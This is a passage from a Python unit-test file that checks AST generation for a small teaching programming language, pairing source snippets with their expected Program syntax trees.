Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(IntLiteral(1),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,340))\n\n\tdef test_350(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nIf !(True) Then\na = a <c;\nIf (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12 + e; EndIf.\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",IntLiteral(12),Id('e')))]))])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,350))\n\n\tdef test_353(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + 1;\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,353))\n\n\tdef test_341(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x =/= y) Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"=/=\"\"\",Id('x'),Id('y'))),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,341))\n\n\tdef test_320(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, b[1]\nBody:\nVar: x=1,a[1]={{}};\nVar: a,b[1]={\"this\"};\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([ArrayLiteral([])])),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,320))\n\n\tdef 
test_343(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) && (a || abc) Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(BinaryOp(\"\"\"&&\"\"\",UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('x'),Id('y')),Id('b'))),BinaryOp(\"\"\"||\"\"\",Id('a'),Id('abc'))),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,343))\n\n\tdef test_329(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('a')),BinaryOp(\"\"\"*\"\"\",Id('b'),CallExpr(Id('foo'),[]))),IntLiteral(1)),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,329))\n\n\tdef test_365(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\nprintLn();\nprint(arg);\nprintStrLn(arg);\nread();\nEndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])]),CallStmt(Id('printLn'),[]),CallStmt(Id('print'),[Id('arg')]),CallStmt(Id('printStrLn'),[Id('arg')]),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,365))\n\n\tdef test_389(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, b\nBody:\nWhile statement Do Break; EndWhile.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None)],([],[While(Id('statement'),([],[Break()]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,389))\n\n\tdef test_335(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = \"abc\", a < 2, i + 1) Do something(); EndFor.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),StringLiteral(\"\"\"abc\"\"\"),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('i'),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,335))\n\n\tdef test_399(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nFor(i=expr, a =/= {{}}, \"what is that\" + 1) 
Do\nEndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[For(Id('i'),Id('expr'),BinaryOp(\"\"\"=/=\"\"\",Id('a'),ArrayLiteral([ArrayLiteral([])])),BinaryOp(\"\"\"+\"\"\",StringLiteral(\"\"\"what is that\"\"\"),IntLiteral(1)),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,399))\n\n\tdef test_328(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nIf 1 < a Then\nVar: a;\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[If([(BinaryOp(\"\"\"<\"\"\",IntLiteral(1),Id('a')),[VarDecl(Id('a'),[],None)],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,328))\n\n\tdef test_342(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) ** && (a || abc)** Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('x'),Id('y')),Id('b'))),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,342))\n\n\tdef test_334(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nFor (i = 1, a < 2, i + 1) Do something(); EndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(1),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('i'),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,334))\n\n\tdef test_336(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something(); EndFor.\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[])),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,336))\n\n\tdef test_300(self):\n\t\tinput = \"\"\"Var:x;\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None)])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,300))\n\n\tdef test_303(self):\n\t\tinput = \"\"\"Var:x = 1, y = \"abc\", z = 1e2, l=True, a[1][2]={{1},{2}};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],StringLiteral(\"\"\"abc\"\"\")),VarDecl(Id('z'),[],FloatLiteral(100.0)),VarDecl(Id('l'),[],BooleanLiteral(True)),VarDecl(Id('a'),[1,2],ArrayLiteral([ArrayLiteral([IntLiteral(1)]),ArrayLiteral([IntLiteral(2)])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,303))\n\n\tdef test_360(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] + foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('c'),[IntLiteral(1),Id('b')]),IntLiteral(1)]),CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,360))\n\n\tdef test_376(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. 
(a-a-.a*a*.a\\.b%!c&&a||a==b) % a[1][1];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('b'),ArrayLiteral([ArrayLiteral([ArrayLiteral([])])])),Assign(Id('a'),BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",Id('a'),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b')),ArrayCell(Id('a'),[IntLiteral(1),IntLiteral(1)]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,376))\n\n\tdef test_314(self):\n\t\tinput = \"\"\"Var: x = \"yay\";\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],StringLiteral(\"\"\"yay\"\"\"))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,314))\n\n\tdef test_331(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + 1 Then\n For (i=1,i>1,1+2) Do\n Var: a=10,c[1]={1,2};\n c[foo() + 1] = a;\n EndFor.\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[If([(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)),[],[For(Id('i'),IntLiteral(1),BinaryOp(\"\"\">\"\"\",Id('i'),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2)),([VarDecl(Id('a'),[],IntLiteral(10)),VarDecl(Id('c'),[1],ArrayLiteral([IntLiteral(1),IntLiteral(2)]))],[Assign(ArrayCell(Id('c'),[BinaryOp(\"\"\"+\"\"\",CallExpr(Id('foo'),[]),IntLiteral(1))]),Id('a'))]))])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,331))\n\n\tdef test_346(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a[1][c[2]] + 123 -1 EndDo.\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('a'),[IntLiteral(1),ArrayCell(Id('c'),[IntLiteral(2)])]),IntLiteral(123)),IntLiteral(1)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,346))\n\n\tdef test_366(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\nprintLn();\n**print(arg);\nprintStrLn(arg)**\nread();\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])]),CallStmt(Id('printLn'),[]),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,366))\n\n\tdef test_396(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else nothing(); a=(1==b+a);\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[While(Id('expr'),([],[])),Dowhile(([],[Return(None)]),ArrayLiteral([ArrayLiteral([])]))])],([],[CallStmt(Id('nothing'),[]),Assign(Id('a'),BinaryOp(\"\"\"==\"\"\",IntLiteral(1),BinaryOp(\"\"\"+\"\"\",Id('b'),Id('a'))))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,396))\n\n\tdef test_364(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), 
{\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n print(arg);\n printStrLn(arg);\n read();\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])]),CallStmt(Id('printLn'),[]),CallStmt(Id('print'),[Id('arg')]),CallStmt(Id('printStrLn'),[Id('arg')]),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,364))\n\n\tdef test_338(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12.; \n EndFor.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[])),IntLiteral(1)),([],[CallStmt(Id('something'),[]),Assign(Id('c'),BinaryOp(\"\"\"+.\"\"\",ArrayCell(Id('a'),[IntLiteral(23),ArrayCell(Id('b'),[IntLiteral(1),IntLiteral(2),Id('c')])]),FloatLiteral(12.0)))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,338))\n\n\tdef test_394(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n Else\n EndIf.\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[])],([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,394))\n\n\tdef test_307(self):\n\t\tinput = \"\"\"Var: x;\nFunction: fact\nParameter: n\nBody:\nIf n == 0 Then\nReturn 1;\nElse\nReturn n * fact(n-1);\nEndIf.\nEndBody.\nFunction: main\n** this is a comment **\nBody:\nx = 10;\nfact (x);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None),FuncDecl(Id('fact'),[VarDecl(Id('n'),[],None)],([],[If([(BinaryOp(\"\"\"==\"\"\",Id('n'),IntLiteral(0)),[],[Return(IntLiteral(1))])],([],[Return(BinaryOp(\"\"\"*\"\"\",Id('n'),CallExpr(Id('fact'),[BinaryOp(\"\"\"-\"\"\",Id('n'),IntLiteral(1))])))]))])),FuncDecl(Id('main'),[],([],[Assign(Id('x'),IntLiteral(10)),CallStmt(Id('fact'),[Id('x')])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,307))\n\n\tdef test_402(self):\n\t\tinput = \"\"\"Var:x = 1, y = 0X5F, z = 0O11, k = True, z = False;\n Var: x = 1e05 , y = 1.e05 , z= 1.25 , k =\"Hohoho\";\n Var: x =\" hehe \" , y = {} , z = {1,2,3}, k ={1,{2,3},True};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],IntLiteral(95)),VarDecl(Id('z'),[],IntLiteral(9)),VarDecl(Id('k'),[],BooleanLiteral(True)),VarDecl(Id('z'),[],BooleanLiteral(False)),VarDecl(Id('x'),[],FloatLiteral(100000.0)),VarDecl(Id('y'),[],FloatLiteral(100000.0)),VarDecl(Id('z'),[],FloatLiteral(1.25)),VarDecl(Id('k'),[],StringLiteral(\"\"\"Hohoho\"\"\")),VarDecl(Id('x'),[],StringLiteral(\"\"\" hehe \"\"\")),VarDecl(Id('y'),[],ArrayLiteral([])),VarDecl(Id('z'),[],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)])),VarDecl(Id('k'),[],ArrayLiteral([IntLiteral(1),ArrayLiteral([IntLiteral(2),IntLiteral(3)]),BooleanLiteral(True)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,402))\n\n\tdef test_386(self):\n\t\tinput = \"\"\"\n Function: 
nothing\n Body:\n Var: a = {1238,32412, 120};\n EndBody.\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('nothing'),[],([VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(1238),IntLiteral(32412),IntLiteral(120)]))],[])),FuncDecl(Id('foo'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None)],([],[CallStmt(Id('nothing'),[ArrayCell(Id('a'),[IntLiteral(1),IntLiteral(1),ArrayCell(Id('b'),[Id('k')])])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,386))\n\n\tdef test_382(self):\n\t\tinput = \"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n ElseIf a \\ 100 -20 Then Continue;\n stop();\n what();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])]),(BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"\\\\\"\"\",Id('a'),IntLiteral(100)),IntLiteral(20)),[],[Continue(),CallStmt(Id('stop'),[]),CallStmt(Id('what'),[])])],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))]))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,382))\n\n\tdef test_383(self):\n\t\tinput = \"\"\"Function: foo\nBody:\n\nIf a > b Then doNothing(); Break;\n\nElseIf !somecon() Then doSomething();\n\nElseIf a \\ 100 -20 Then Continue;\nstop();\n\nElseIf whatever() Then \n\nElseIf anything() Then Do something(); While a + foo()[100] EndDo.\nEndIf.\nEndBody.\nFunction: main\nParameter: a, b[1][100]\nBody:\nWhile a<b Do\nEndWhile.\nEndBody.\"\"\"\n\t\texpect = 
Program([FuncDecl(Id('foo'),[],([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])]),(BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"\\\\\"\"\",Id('a'),IntLiteral(100)),IntLiteral(20)),[],[Continue(),CallStmt(Id('stop'),[])]),(CallExpr(Id('whatever'),[]),[],[]),(CallExpr(Id('anything'),[]),[],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))])],[])])),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,383))\n\n\tdef test_352(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 